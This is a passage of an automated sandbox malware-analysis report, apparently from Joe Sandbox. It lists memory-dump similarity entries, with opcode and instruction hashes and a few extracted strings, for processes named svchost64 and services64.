• String ID: M_^#$M_^%$M_^3$M_^5$M_^7$M_^9$M_^=
• API String ID: 0-4104247842
• Opcode ID: e5df2f1a0c94c2a5700bd2ec53dc98dc43668e58568cc1cc3a7b51a85b683ab9
• Instruction ID: f943ed48b8587d870d3249667bc72643fc3be34ae975d2e2a84b3a5905bf9faa
• Opcode Fuzzy Hash: e5df2f1a0c94c2a5700bd2ec53dc98dc43668e58568cc1cc3a7b51a85b683ab9
• Instruction Fuzzy Hash: D32107776040298AD316BA6CBCA55DC3354EE9033E75507B3D4A9CE093ED25A08BC9C4

Strings
Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID: M_^#$M_^%$M_^3$M_^5$M_^7$M_^9$M_^=
• API String ID: 0-4104247842
• Opcode ID: a6b0545bb5e748944968631a0bfd2d6ce81ce9f096ebc217463a6d09893af3e6
• Instruction ID: a90f509e53ab9ddc71dcf2d3176be1cbdc3aa4ca6c9cfb1f6b7c849cf730c3f0
• Opcode Fuzzy Hash: a6b0545bb5e748944968631a0bfd2d6ce81ce9f096ebc217463a6d09893af3e6
• Instruction Fuzzy Hash: 98C09B0190D29104D35572BC3C215D41B004F1653F70CC7F7F4DD0C0D74C042049C14D

Strings
Memory Dump Source
• Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
Similarity
• API ID:
• String ID: 3CL_^
• API String ID: 0-3907758863
• Opcode ID: 3402e8dd738321724acd605a9a3561a3f744a7bd3f042df60696dd445eb77d60
• Instruction ID: eb913c4327095959294c1e44d55e0cb6fd3ec7129d2486105729fd81635c7670
• Opcode Fuzzy Hash: 3402e8dd738321724acd605a9a3561a3f744a7bd3f042df60696dd445eb77d60
• Instruction Fuzzy Hash: D381B121B18D494FE7A4FB7C8879BA977D2EF99314F0406B9E01DC72EBDD68A8418341

Memory Dump Source
• Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e18c10c158f7297c30c1f3d1203892f47a88e6cf4d3e6691629e13399db0dae
• Instruction ID: e635819ef31556c94385705d9a09dcd1a6a7f4eaa99f8f7f75eb6a0a7d9c2151
• Opcode Fuzzy Hash: 1e18c10c158f7297c30c1f3d1203892f47a88e6cf4d3e6691629e13399db0dae
• Instruction Fuzzy Hash: 45712A20B1DA894FDB65EB6C98756B97BE1EFDA314F0401BAE08DC32A3DD585C42C346

Memory Dump Source
• Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67e585d44da8378e9375b5c7df26702735bdc638f9b2b89451625505f1607b3e
• Instruction ID: 25e55a16a58fcb20676128225c3d397038e60c32c41ae445fde16e36155887cb
• Opcode Fuzzy Hash: 67e585d44da8378e9375b5c7df26702735bdc638f9b2b89451625505f1607b3e
• Instruction Fuzzy Hash: 0A510830B1DA494FEB58EB6C98697BC77D1EF9D314F44027AE04DC32A2DD64AC428786

Memory Dump Source
• Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f3c3ecf833f107fd320545649c5be650ec84069228072bf476b315a448d155e
• Instruction ID: 26f22a08db0a60604e50060b25d3c3ea406cc080e1aea6ea28264500278ba8f6
• Opcode Fuzzy Hash: 6f3c3ecf833f107fd320545649c5be650ec84069228072bf476b315a448d155e
• Instruction Fuzzy Hash: 7851D831B1C9094FEB98EB6C94697BD77D1EF99710F40027AE04DC32A6DE64AC428786
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000072.00000002.2835357709.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_114_2_7ffd9bad0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 140f4e28bf58017f7897243453404a3403bd1744ce8f81e7cc41e5591c0b8063
                                                                                                                                                                  • Instruction ID: 439f5a7a8f0a32d1250ed3cc558cd6f55a65d13adcbcf965b002e19100b80b29
                                                                                                                                                                  • Opcode Fuzzy Hash: 140f4e28bf58017f7897243453404a3403bd1744ce8f81e7cc41e5591c0b8063
                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0207250D64C2EE7189559AC279F63B98EA83260B00000EE08A82142E1522913C292
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3CO_^
                                                                                                                                                                  • API String ID: 0-3937211734
                                                                                                                                                                  • Opcode ID: 732a88fdf7f92e45f4cda35bcea1d406ae44aaf8ab752da100727ca92e76dac9
                                                                                                                                                                  • Instruction ID: 98fb786b2ae6e2024df1b5f24e10fc3b31633ed870a053d315c7747352d58d06
                                                                                                                                                                  • Opcode Fuzzy Hash: 732a88fdf7f92e45f4cda35bcea1d406ae44aaf8ab752da100727ca92e76dac9
                                                                                                                                                                  • Instruction Fuzzy Hash: C791C121B189494FE7A4FB7C8469BB977D2EF98314F0406BAE05DC72E7DD28AC418351
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2c7eb9dce99f76f91e0acf438e519c8798c2a8c3ccf901dfb54f863e957640cc
                                                                                                                                                                  • Instruction ID: ceb0e686b3994351208e0b173b1411bf1d66c296f974fbcc040ab08d3522e9d0
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c7eb9dce99f76f91e0acf438e519c8798c2a8c3ccf901dfb54f863e957640cc
                                                                                                                                                                  • Instruction Fuzzy Hash: B1716B20B1DA894FD765EB6C98656B97BE2EF9A314F0401BAF08DC32D3DD586C02C356
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8580d3d0aa7b5e2979d34cef7a62edfcdcfaa45bacac81bb504ffc645552d250
                                                                                                                                                                  • Instruction ID: 5615cbfb4851e1c1f4ffb910a02668b13280fb9215f685d361d8fb13e26c7f8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 8580d3d0aa7b5e2979d34cef7a62edfcdcfaa45bacac81bb504ffc645552d250
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51F830B1DA494FEB58EB6C98657BC77D2EF99314F04017AE04DC3292DD686C428396
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7b02eaa11fc06bd0365a2d1c9a659dea737b6408fa975ac8260e0e0545fa9cf9
                                                                                                                                                                  • Instruction ID: 7d230627126cb713586b2d01ac849aaca85bfa5403cc5aa7c26f9cd29443b270
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b02eaa11fc06bd0365a2d1c9a659dea737b6408fa975ac8260e0e0545fa9cf9
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B51D631B1CA094FEBA8EB6C94697BD77D2EF98714F04017AE04DC3292DE64AC428795
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bcbf5b9daf6dd6dffcf539807e59e12e5f84c33442dfd681841e108677c3c6bb
                                                                                                                                                                  • Instruction ID: 27d862297e15114eb8d8cd8268d5f5870ebe3bb9e00dc3af48781b3ce59c618b
                                                                                                                                                                  • Opcode Fuzzy Hash: bcbf5b9daf6dd6dffcf539807e59e12e5f84c33442dfd681841e108677c3c6bb
                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0E57391D74C1EE7589559AC179F63B98EB83270F00105FE19EC6153E15269138256
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UZNR$UZNR
                                                                                                                                                                  • API String ID: 0-226416416
                                                                                                                                                                  • Opcode ID: b9e04c354329d4d860f20270a5dd6b14005f63bc61c2287985c4d8f0dc6940d0
                                                                                                                                                                  • Instruction ID: c8fbb9c9cd94598fdf7d9779f96e0415a5a168fcd361f53a21501aa94967a92a
                                                                                                                                                                  • Opcode Fuzzy Hash: b9e04c354329d4d860f20270a5dd6b14005f63bc61c2287985c4d8f0dc6940d0
                                                                                                                                                                  • Instruction Fuzzy Hash: C4F1A531A09A4D8FEBA8DF28C8557E937E1FF54310F04826EE84DC7295DB7499458B82
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UZNR$UZNR
                                                                                                                                                                  • API String ID: 0-226416416
                                                                                                                                                                  • Opcode ID: 2ee1863193fd9e1167b8d5584ca5e2df02a55729b70b4b2ab35e75ae99606908
                                                                                                                                                                  • Instruction ID: 06dc14c29c253179cd3c781946588afd5489f33e5259cb4c6ecb62e6a3c7293a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ee1863193fd9e1167b8d5584ca5e2df02a55729b70b4b2ab35e75ae99606908
                                                                                                                                                                  • Instruction Fuzzy Hash: BCF1D530A09A4E8FEBA9DF28C8557EA77D2FF54310F04426ED84DC72A5DF74A9448B81
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3b4466ec28dc4f2f0dbbd52ad308953ec74d5b3d2bf2bb7a243e54c3dfee0207
                                                                                                                                                                  • Instruction ID: 261c3827fd60650a1ca2135757c6e4d19a0f1cbc35133cfce05389c0033aafb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b4466ec28dc4f2f0dbbd52ad308953ec74d5b3d2bf2bb7a243e54c3dfee0207
                                                                                                                                                                  • Instruction Fuzzy Hash: FB92E331B1991D4FEBA4EB688465BB873E2FF99708F050179D00EC32E6DE686D42CB41
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UZNR$UZNR
                                                                                                                                                                  • API String ID: 0-226416416
                                                                                                                                                                  • Opcode ID: 739df1d4067b47e5aa0f11e0fecc2fbdbfff920cfeab411f6bb8f2951d8fddaa
                                                                                                                                                                  • Instruction ID: 12a049057d9e06ec69ba1fc4c79ff6340e1294656ba716e5c076107345427afa
                                                                                                                                                                  • Opcode Fuzzy Hash: 739df1d4067b47e5aa0f11e0fecc2fbdbfff920cfeab411f6bb8f2951d8fddaa
                                                                                                                                                                  • Instruction Fuzzy Hash: 13B1D630A0DA4E4FEB68EF28C8557E93BD1FF55310F04426EE85DC72A2CA749945CB92
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 04053e43c7f6a46cf09cb6b6004fa374c5c89ea3c709c20a6a611a1fd3e1ac8d
                                                                                                                                                                  • Instruction ID: 0fe7eb87c55adb0cc88f45839fb98b48a84ea7a4b0b1c1b1b37d694c832b9a9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 04053e43c7f6a46cf09cb6b6004fa374c5c89ea3c709c20a6a611a1fd3e1ac8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A413B62B0EACA4FE7619B6C48751A97BE1FF15324B4901BAC099C70E3DE5C69054362
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
• String ID:
• API String ID:
• Opcode ID: 3e57799674ef40a641b4bff6efe86246f62561f4c0d0d3e72c8a6e4ee148c813
• Instruction ID: 4956725f861ec4699f4a3368607f632eb0c090a94db32218a93519cb02de8124
• Opcode Fuzzy Hash: 3e57799674ef40a641b4bff6efe86246f62561f4c0d0d3e72c8a6e4ee148c813
• Instruction Fuzzy Hash: FA819230F19A4E8FDB94EBA8C8A4AAC7BF1FF59304F4505B6D00DD71A6DE28A841C751

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b1ff537b2a606d0c5b45b6091ff8f8bd8e6817d73db9869ea52db287366f7d81
• Instruction ID: b3afa0621eba83c162bd0dec30c047fdc2ca845fce1295f59faf164e9b98b77b
• Opcode Fuzzy Hash: b1ff537b2a606d0c5b45b6091ff8f8bd8e6817d73db9869ea52db287366f7d81
• Instruction Fuzzy Hash: 8A51E622B19C0D4BEBA8E76C4466BBDB3D2EF9C715F540279E01DC32D6CD28AD428751

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b392fe52888a26d9cefca33dbb4cbf5e5e8598c65b3028371357e2cef4e2436
• Instruction ID: a90abfebca7f0dad0d407a2c17715faf8b2fe9877cd320e6b4013520209e3530
• Opcode Fuzzy Hash: 0b392fe52888a26d9cefca33dbb4cbf5e5e8598c65b3028371357e2cef4e2436
• Instruction Fuzzy Hash: 21518031D08A1C8FDB68DF58D855BE9BBF1FB59310F0082AAD04DD3292DE74A9858F81

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5420a017383b77b5588255b362b59c23a9d35b0f6c6c80eb4e71e087a3a1a4af
• Instruction ID: b57f6da1777b66262a20733f364b73ddf8af64266ab24a569dc02b4e3e14ed60
• Opcode Fuzzy Hash: 5420a017383b77b5588255b362b59c23a9d35b0f6c6c80eb4e71e087a3a1a4af
• Instruction Fuzzy Hash: CF51C930B18A494FDB98EB2C8469A6977D2FF9C708F040579E04EC33D6DE68AC428785

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 040b01d6acf87bffc9c95b4033f019c1bf0e051319538eb90b1e911747b07ddc
• Instruction ID: 1340d2c1db151705400b280daa8917d2ff2b200dd81658ca25f8f465d4b23ee7
• Opcode Fuzzy Hash: 040b01d6acf87bffc9c95b4033f019c1bf0e051319538eb90b1e911747b07ddc
• Instruction Fuzzy Hash: A051E521B09C0D4BEBA8E76C4465BBDB3C2EF9C715F1402B9E01CC32DACD28AD428781

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82257efae6b5e6d6a2582ccae5c553232029cb4a63432718bed8892ef9210fb4
• Instruction ID: c6023633853eb034637969bbea2f79e31e6158b9ca398c2a55766c7f2ee10a36
• Opcode Fuzzy Hash: 82257efae6b5e6d6a2582ccae5c553232029cb4a63432718bed8892ef9210fb4
• Instruction Fuzzy Hash: CB41D931B1CA494FE758EB2C8469BA977D2EF98704F040179F04DC32D6DD68AD428795

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e74eb94b0763647ec1495217ce97d4471b5dcdafc0f6db01f3909bd9e76c6eb
• Instruction ID: e6465416ff422adc8e082dc82e945ee501e5a3700348beb479bbdb52c6e1b0f4
• Opcode Fuzzy Hash: 5e74eb94b0763647ec1495217ce97d4471b5dcdafc0f6db01f3909bd9e76c6eb
• Instruction Fuzzy Hash: A541D531B1DA0D4FE7A4EB6888717B873D3EF89704F0241BAD04DD32A2DE696D428751

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5df82e816880eb83301a26914ce0cd83800ff3279836498e6ba6725abb0ae39
• Instruction ID: 508778f899113d445f7e4c8d6db8a18debcd1f01b2a171b1877479fe37bcb9a4
• Opcode Fuzzy Hash: d5df82e816880eb83301a26914ce0cd83800ff3279836498e6ba6725abb0ae39
• Instruction Fuzzy Hash: 47513030E1994D8FDB94EBA8C8A4AADB7F2FF58304F410575E00DD72A6DE38A841CB51

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b55b0e37c7311a529a6224802bf5e06ed3b574d8b0fcf58527b2b0232eac5f06
• Instruction ID: dc781efbc0643d2fddd8576764bd852cbbb2ac5089102a590e50cc3cc3f4a05d
• Opcode Fuzzy Hash: b55b0e37c7311a529a6224802bf5e06ed3b574d8b0fcf58527b2b0232eac5f06
• Instruction Fuzzy Hash: 73117B63F0FA490FE3A49BAC1C652B0A7C2EF9865570501BBE05DC31EBEC545D0243D1

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 99246e3f1bdb174c523486bd0a04b0483f16c0dfe6033e9d7e9a7035f2d3dbc5
• Instruction ID: 4ca67369bb5568430b40e1b72623c36730f9f407b1df0a44b65da96444bed966
• Opcode Fuzzy Hash: 99246e3f1bdb174c523486bd0a04b0483f16c0dfe6033e9d7e9a7035f2d3dbc5
• Instruction Fuzzy Hash: 9201C071B5D90C9FDF94EB9CE855AACB7E1EF59310F010129E10ED3252CA65A8528B41

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3147171f47ac0674cd686c25434c8c4c4570734d782df982bb7553ea0ff01bfa
• Instruction ID: 37696437c8ece754dd62299efe32af37ef5f1f6e8a5b5bcefa2256183713af30
• Opcode Fuzzy Hash: 3147171f47ac0674cd686c25434c8c4c4570734d782df982bb7553ea0ff01bfa
• Instruction Fuzzy Hash: 55012653F0ED090FE3B4AAAC5C696B162C3DFD8665B12017AE00EC32EAEC542C0243A0

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61f18814863f74ba41e5e3706882d35eda86b08bcdeed4ea3441d56e49f28678
• Instruction ID: dde658fdaef5faf288c68c2912b213a09c8698edf062a7017b379a0f9326f7cd
• Opcode Fuzzy Hash: 61f18814863f74ba41e5e3706882d35eda86b08bcdeed4ea3441d56e49f28678
• Instruction Fuzzy Hash: 75F0557260D70C1EE7589609AC079F63B98EB83230F00100EE19EC2142E01228138292

Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 939e688b70ca7bb2b38f6de4ed2e352602d498d930b2e43da0e07d5d558673f9
• Instruction ID: 64a0cbcfdcc85bcae9bad048bcbf870c54b575fb8c8eff7dcee0fe174722a8d3
• Opcode Fuzzy Hash: 939e688b70ca7bb2b38f6de4ed2e352602d498d930b2e43da0e07d5d558673f9
• Instruction Fuzzy Hash: E4E04821B18C1D0F9AA4FB3D5865E6562D2EF9C22074546B6E40CC329ADD28DC414381

Strings
Memory Dump Source
• Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Similarity
• API ID:
• String ID: O_^#$O_^%$O_^3$O_^5$O_^7$O_^9$O_^=
• API String ID: 0-3014927448
• Opcode ID: d23c94e1bde4bf2ccf0b9befd13401840e7596ea185d9972ac1f9428e2c7f4a9
• Instruction ID: c6e67de869fb0f0c2e8de7fcdce2ebda4cd69952ec1b2414fd199a6d3c5cd08b
• Opcode Fuzzy Hash: d23c94e1bde4bf2ccf0b9befd13401840e7596ea185d9972ac1f9428e2c7f4a9
• Instruction Fuzzy Hash: 442125777051291AD316BA2CBCA14DD3754EA8033B70407B3E4AECE257DD25A09BC6D0

Memory Dump Source
• Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 99f13f1338d45aaeaeeb9a6193ec434446475d7af7a5c71b451a462f6df832f0
• Instruction ID: d0825a0be41009f089ed09a3e746debe1fce5c0b5a045e6dc4021fde33aee978
• Opcode Fuzzy Hash: 99f13f1338d45aaeaeeb9a6193ec434446475d7af7a5c71b451a462f6df832f0
• Instruction Fuzzy Hash: C0F16030A09A4D8FEBA8EF28C8557E937D1EF54310F04426EE85DC72A5DF74A9458B81

Memory Dump Source
• Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f859ec1b215603f6a48d278fc7ed4fefcf75e161abad02dcf8fa2457d1c5238d
• Instruction ID: 7e980c6a7b5f05666ce3a07ac823d19be8b959e038b08e51811343ca91708609
• Opcode Fuzzy Hash: f859ec1b215603f6a48d278fc7ed4fefcf75e161abad02dcf8fa2457d1c5238d
• Instruction Fuzzy Hash: 15E1B530A09A4D8FEBA8EF28C8567F977D1FF54310F14426EE84DC72A5DE74A9418B81

Strings
Memory Dump Source
• Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Similarity
• API ID:
• String ID: [7M_^
• API String ID: 0-2755054207
• Opcode ID: f67d87379a46770a7b53c8e6fc54945c27aeb29bc4e5d69c0c5ff24cb7557899
• Instruction ID: d2fd169258af07fa17333ad54e8516f64195ed9bf2e7540eceefc2f5316d4893
                                                                                                                                                                  • Opcode Fuzzy Hash: f67d87379a46770a7b53c8e6fc54945c27aeb29bc4e5d69c0c5ff24cb7557899
                                                                                                                                                                  • Instruction Fuzzy Hash: 61A1D431B1990D4FEBA4FB6884697B973D2EFA8314F514179E41DC72E6CE78A8428740
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: [7M_^
                                                                                                                                                                  • API String ID: 0-2755054207
                                                                                                                                                                  • Opcode ID: 52a4447cb5ce10e95c69c46839469c6a59c7f3098c78de96358947128a0b00b7
                                                                                                                                                                  • Instruction ID: 3ba5b0b06d7706d96f47fa8aad906075cce9d850eb12917860080accff504a11
                                                                                                                                                                  • Opcode Fuzzy Hash: 52a4447cb5ce10e95c69c46839469c6a59c7f3098c78de96358947128a0b00b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 4501E131B1D9498EE729F368D422BFA73E0EF94328F004679E04EC71D7CE6969428381
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 24a029d15958f6a8dfcd8a89811fc6da071459af3f42a4840194381f7ff82aa6
                                                                                                                                                                  • Instruction ID: d95777ff94347b4deab743903efffeeba412eef2fe53de0c376157acf92fa491
                                                                                                                                                                  • Opcode Fuzzy Hash: 24a029d15958f6a8dfcd8a89811fc6da071459af3f42a4840194381f7ff82aa6
                                                                                                                                                                  • Instruction Fuzzy Hash: F6D14B62B0E9490FE7A4FB6C88656B977D2EFA4310F0501BAE45DC72E7CD68ED458380
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 803dc4c373674a967346147a4f79a6fa8aa825e09d3f91daa14c616c31b99e49
                                                                                                                                                                  • Instruction ID: 388f124f7925c008f669f362b6cf7494456ab7e2dc8c3f2c80e0cf7a2d337e29
                                                                                                                                                                  • Opcode Fuzzy Hash: 803dc4c373674a967346147a4f79a6fa8aa825e09d3f91daa14c616c31b99e49
                                                                                                                                                                  • Instruction Fuzzy Hash: 31A11731B0990D4FEBA4FB2888697B977E2EFA8314F5541B9D41DC72E6CE38AC418740
